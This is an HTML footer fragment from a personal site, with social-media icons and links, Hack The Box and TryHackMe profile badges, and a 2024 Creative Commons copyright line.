      <a title="GitHub Profile" href="https://github.com/rubelperez"><span class="icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 0c-6.626 0-12 5.373-12 12 0 5.302 3.438 9.8 8.207 11.387.599.111.793-.261.793-.577v-2.234c-3.338.726-4.033-1.416-4.033-1.416-.546-1.387-1.333-1.756-1.333-1.756-1.089-.745.083-.729.083-.729 1.205.084 1.839 1.237 1.839 1.237 1.07 1.834 2.807 1.304 3.492.997.107-.775.418-1.305.762-1.604-2.665-.305-5.467-1.334-5.467-5.931 0-1.311.469-2.381 1.236-3.221-.124-.303-.535-1.524.117-3.176 0 0 1.008-.322 3.301 1.23.957-.266 1.983-.399 3.003-.404 1.02.005 2.047.138 3.006.404 2.291-1.552 3.297-1.23 3.297-1.23.653 1.653.242 2.874.118 3.176.77.84 1.235 1.911 1.235 3.221 0 4.609-2.807 5.624-5.479 5.921.43.372.823 1.102.823 2.222v3.293c0 .319.192.694.801.576 4.765-1.589 8.199-6.086 8.199-11.386 0-6.627-5.373-12-12-12z"/></svg>
</span><span>rubelperez</span></a>
    </li>
  

  
    <li class="social-media-list">
      <a title="X Profile" href="https://x.com/danielprz217"><span class="icon"><svg xmlns="http://www.w3.org/2000/svg"  viewBox="0 0 48 48" width="24px" height="24px" clip-rule="evenodd" baseProfile="basic"><polygon fill="#616161" points="41,6 9.929,42 6.215,42 37.287,6"/><polygon fill="#fff" fill-rule="evenodd" points="31.143,41 7.82,7 16.777,7 40.1,41" clip-rule="evenodd"/><path fill="#616161" d="M15.724,9l20.578,30h-4.106L11.618,9H15.724 M17.304,6H5.922l24.694,36h11.382L17.304,6L17.304,6z"/></svg>
</span><span>danielprz217</span></a>
    </li>
  

  

  
    <li class="social-media-list">
      <a title="LinkedIn Profile" href="https://linkedin.com/in/rubeldanielperez"><span class="icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 0h-14c-2.761 0-5 2.239-5 5v14c0 2.761 2.239 5 5 5h14c2.762 0 5-2.239 5-5v-14c0-2.761-2.238-5-5-5zm-11 19h-3v-11h3v11zm-1.5-12.268c-.966 0-1.75-.79-1.75-1.764s.784-1.764 1.75-1.764 1.75.79 1.75 1.764-.783 1.764-1.75 1.764zm13.5 12.268h-3v-5.604c0-3.368-4-3.113-4 0v5.604h-3v-11h3v1.765c1.396-2.586 7-2.777 7 2.476v6.759z"/></svg>
</span><span>rubeldanielperez</span></a>
    </li>
  


  <!---->

  

  <li class="social-media-list">
    <a title="RSS Feed" href="/feed.xml"><span class="icon-nofill"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path fill="#ee802f" d="M6.503 20.752c0 1.794-1.456 3.248-3.251 3.248-1.796 0-3.252-1.454-3.252-3.248 0-1.794 1.456-3.248 3.252-3.248 1.795.001 3.251 1.454 3.251 3.248zm-6.503-12.572v4.811c6.05.062 10.96 4.966 11.022 11.009h4.817c-.062-8.71-7.118-15.758-15.839-15.82zm0-3.368c10.58.046 19.152 8.594 19.183 19.188h4.817c-.03-13.231-10.755-23.954-24-24v4.812z"/></svg>
</span><span>rss</span></a>
  </li>
</ul>

      </div>
      <div class="footer-col-badges col-3 col-s-5">
        <ul>
  
    <li class="social-media-list">
      <a title="Hack The Box Profile" href="https://app.hackthebox.com/profile/730318"><img src="https://www.hackthebox.eu/badge/image/730318" alt="Hack The Box"></a>
    </li>
  

  
    <li class="social-media-list">
      <a title="TryHackMe Profile" href="https://tryhackme.com/p/danielprz217"><img src="https://tryhackme-badges.s3.amazonaws.com/danielprz217.png" alt="TryHackMe"></a>
    </li>
  
</ul>


      </div>
      <div class="footer-col-copyright col-10 col-s-10">
        <a href="http://creativecommons.org/licenses/by-nc/3.0/deed.en_US">
          <span>
              <b>danielprz21</b>
          </span>
          
          <span>© 2024</span>
        </a>
      </div>
    </div>
  </div>
</footer>


    
  </body>
</html>
